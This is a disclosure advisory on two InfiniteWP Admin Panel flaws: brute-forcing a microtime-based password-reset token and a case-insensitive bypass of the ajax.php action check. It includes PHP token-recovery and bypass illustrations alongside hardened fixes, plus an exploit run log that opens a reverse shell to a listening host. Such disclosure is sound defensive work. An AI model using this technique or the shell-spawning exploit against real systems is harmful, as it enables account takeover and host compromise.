A vulnerability in the InfiniteWP Admin Panel allows an unauthenticated attacker who knows the email address of any user of the system to log in as that user, through a flaw in the product's password reset mechanism. A second vulnerability then allows the attacker to achieve Remote Code Execution on the host.
This advisory covers two vulnerabilities: the first was previously reported by Hermann Weiss (hw at whitehack.de), which the vendor took months to fix, during which time we found it too, plus another one that was previously unknown.
InfiniteWP is a “free self hosted, multiple WordPress site management solution. It simplifies your WordPress tasks with a click of a button”. For more information visit https://infinitewp.com/.
The password reset link is created by the InfiniteWP Admin Panel by the code in function userLoginResetPassword($params) (controllers/appFunctions.php line 1341):
In that code, $userDets['userID'] is the target user identifier and $params["email"] is their email address.
An attacker therefore only needs the user ID, the user's email address and the value returned by the call to microtime(true) in order to build the correct link and reset the victim's password (user IDs are small integers and the proof of concept simply iterates them starting from 1):
the email address can be verified beforehand: a reset request for an unregistered address ends up at login.php?view=resetPassword&errorMsg=resetPasswordEmailNotFound, while any other outcome means the address is registered;
microtime(true) is the current UNIX timestamp with microseconds (php.net/microtime), so it can be narrowed down by using the HTTP “Date” response header (second precision) as the reference point for building the dictionary. The header and the microtime call come from the same server while handling the same request, so the remaining uncertainty is the microsecond part, plus the chance that the call lands on the other side of a second boundary.
By building a dictionary of all the possible resetHash values it is possible to guess the correct password reset token and reset the victim's password. The attack succeeds with at most 1 million attempts (one per microsecond of the known second) within the 24 hour window in which the token is valid (the password reset token expires after 24 hours), which is a reasonable timing. During the proof-of-concept tests the average total time required to exploit the issue was about 1 hour; the timing may differ depending on network speed, congestion and configuration, and on the output of the microtime call.
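The following PHP is an added illustration and not InfiniteWP's code: the page does not reproduce the exact derivation used in userLoginResetPassword(), so weakResetToken() below is an assumed stand-in that only shares the property the advisory describes (it depends solely on the user ID, the email and microtime(true)). The attacker-side recoverWeakToken() shows how the dictionary is built from the HTTP Date header, and issueResetToken()/verifyResetToken() show the hardened form (CSPRNG token, stored hashed, expiring, single use, compared in constant time). All function names, the sample email and the timestamp are hypothetical.

```php
<?php
// Added example, not InfiniteWP code. The weak token is an illustrative
// stand-in with the one property the advisory describes: it is a function
// of the user ID, the email address and microtime(true) only.

function weakResetToken(int $userId, string $email, float $now): string {
    // Concatenation turns the float into a string using the "precision"
    // ini setting (14 significant digits by default).
    return sha1($userId . $email . $now);
}

// Attacker side: the HTTP Date header tells us the second in which the token
// was generated. Enumerate every microsecond of that second, and of the next
// one in case the microtime() call straddled a second boundary.
function recoverWeakToken(int $userId, string $email, string $dateHeader, string $target): ?string {
    $second = strtotime($dateHeader);   // e.g. "Thu, 13 Aug 2020 12:45:28 GMT"
    if ($second === false) {
        return null;
    }
    foreach ([$second, $second + 1] as $s) {
        for ($us = 0; $us < 1000000; $us++) {
            $candidate = $s + $us / 1000000;
            if (hash_equals($target, weakResetToken($userId, $email, $candidate))) {
                return sprintf('%.6F', $candidate);
            }
        }
    }
    return null;   // not within the two enumerated seconds
}

// Hardened form: unguessable token from the CSPRNG, stored only as a hash,
// bound to an expiry, single use, compared in constant time.
function issueResetToken(array &$store, int $userId, int $ttl = 86400): string {
    $token = bin2hex(random_bytes(32));
    $store[$userId] = ['hash' => hash('sha256', $token), 'expires' => time() + $ttl];
    return $token;   // sent to the user, never stored in clear
}

function verifyResetToken(array &$store, int $userId, string $token): bool {
    if (!isset($store[$userId]) || $store[$userId]['expires'] < time()) {
        return false;
    }
    $ok = hash_equals($store[$userId]['hash'], hash('sha256', $token));
    if ($ok) {
        unset($store[$userId]);   // a token can be redeemed once
    }
    return $ok;
}

// Demo on a constructed timestamp: what microtime(true) returned server side
// and the Date header the same response carried.
$issuedAt   = 1597322728.4321;
$dateHeader = gmdate('D, d M Y H:i:s', 1597322728) . ' GMT';
$target     = weakResetToken(1, 'victim@example.org', $issuedAt);
echo "recovered microtime: ", recoverWeakToken(1, 'victim@example.org', $dateHeader, $target) ?? 'none', PHP_EOL;

$store = [];
$t = issueResetToken($store, 1);
var_dump(verifyResetToken($store, 1, $t));   // bool(true)
var_dump(verifyResetToken($store, 1, $t));   // bool(false): single use
```

Running it prints the first microsecond candidate whose string form reproduces the weak token, followed by true and then false for the hardened token. Because PHP renders a float into a string with at most "precision" significant digits, many neighbouring microseconds of a 10-digit timestamp produce the same string, so the search stops on the first candidate that reproduces the token rather than on the exact microsecond; the enumeration of one million candidates per second is therefore an upper bound.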
At this point the attacker is able to reset the victim's password and gain access to the InfiniteWP Admin Panel; the next vulnerability covers how to turn that access into authenticated Remote Code Execution on the host machine.
In 2016 a remote code execution vulnerability was found in InfiniteWP Admin Panel 2.8.0, affecting the /ajax.php API endpoint; its details are publicly available.
As described in that advisory, the vulnerability was fixed by adding a call to function checkDataIsValid($action) (controllers/panelRequestManager.php line 3782):
However, that check does not take into account that PHP function names are case insensitive: submitting the action as “addfunctions” (note the lowercase “f”) gets past the string comparison added by the patch, while PHP still resolves the name to the same function, so remote code execution is achieved again.
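As an added illustration, not code from the InfiniteWP project (the handler, the action names and the shape of the deny list are assumptions), the following PHP shows why a case-sensitive comparison of the action name fails to guard a dynamic call, and one way to harden it:

```php
<?php
// Added example, not InfiniteWP code. Illustrates the bypass of a
// case-sensitive name check in front of a dynamic function call.

// Stand-in for a privileged handler reachable through the AJAX endpoint.
function addFunctions(array $params): string {
    return "privileged code path reached with " . json_encode($params);
}

// Vulnerable check (assumed shape): a deny list compared case-sensitively.
function checkDataIsValid_vulnerable(string $action): bool {
    $denied = ['addFunctions'];
    return !in_array($action, $denied, true);   // 'addfunctions' is not in the list
}

// Hardened check: an allow list of legitimate handlers (names assumed),
// compared after lower-casing, which is how PHP itself resolves the name.
function checkDataIsValid_hardened(string $action): bool {
    $allowed = ['listsites', 'getsitestatus'];
    return in_array(strtolower($action), $allowed, true);
}

// Dispatcher modelled on "check the name, then call it dynamically".
function dispatch(string $action, array $params, callable $check): string {
    if (!$check($action)) {
        return "rejected: $action";
    }
    if (!function_exists($action)) {      // also case-insensitive
        return "unknown action: $action";
    }
    return $action($params);              // PHP resolves 'addfunctions' to addFunctions()
}

$params = ['sites' => [1]];
echo dispatch('addFunctions', $params, 'checkDataIsValid_vulnerable'), PHP_EOL; // rejected
echo dispatch('addfunctions', $params, 'checkDataIsValid_vulnerable'), PHP_EOL; // privileged code path reached
echo dispatch('addfunctions', $params, 'checkDataIsValid_hardened'), PHP_EOL;   // rejected
```

The deny list only catches the exact spelling it was written with, whereas function_exists() and the call through $action() both ignore case; an allow list of the handlers that are meant to be reachable, normalised the same way PHP normalises names, removes the mismatch.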
The -d option enables debug mode, which outputs a more verbose log.
$ ./iwp-userloginsetpassword-unauthenticated-account-takeover-and-rce-exploit.py -e 'firstname.lastname@example.org' -rh http://vm.local/iwp -lh 10.10.10.13
2020-08-13 14:45:29,496 - INFO - initiating password reset...
2020-08-13 14:45:29,537 - INFO - reset token has been generated at 1597322728, starting the bruteforce...
2020-08-13 14:45:29,538 - INFO - starting with uid 1...
2020-08-13 14:50:05,318 - INFO - tested 50000 (5.0%) hashes so far for uid 1...
2020-08-13 14:54:49,094 - INFO - tested 100000 (10.0%) hashes so far for uid 1...
2020-08-13 14:59:15,282 - INFO - tested 150000 (15.0%) hashes so far for uid 1...
2020-08-13 15:04:19,933 - INFO - tested 200000 (20.0%) hashes so far for uid 1...
2020-08-13 15:08:55,162 - INFO - tested 250000 (25.0%) hashes so far for uid 1...
2020-08-13 15:13:38,524 - INFO - tested 300000 (30.0%) hashes so far for uid 1...
2020-08-13 15:15:43,375 - INFO - password has been reset, you can now login using email@example.com:msCodWbsdxGGETswnmWJyANE/x2j6d9G
2020-08-13 15:15:43,377 - INFO - removing from the queue all the remaining hashes...
2020-08-13 15:15:45,431 - INFO - spawning a remote shell...
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=1(daemon) gid=1(daemon) groups=1(daemon)
$ uname -a
Linux debian 4.19.0-10-amd64 #1 SMP Debian 4.19.132-1 (2020-07-24) x86_64 GNU/Linux
$ exit
*** Connection closed by remote host ***
An unauthenticated attacker can take over the admin account and then achieve Remote Code Execution on the host.
Upgrade to InfiniteWP version 2.15.7 or later (Note: we didn't verify the patch).
Hermann Weiss (hw at whitehack.de) publishes their advisory about the account takeover issue only (the first discussed above)
Hermann Weiss (hw at whitehack.de) for being the first to discover the account takeover vulnerability
23 December 2020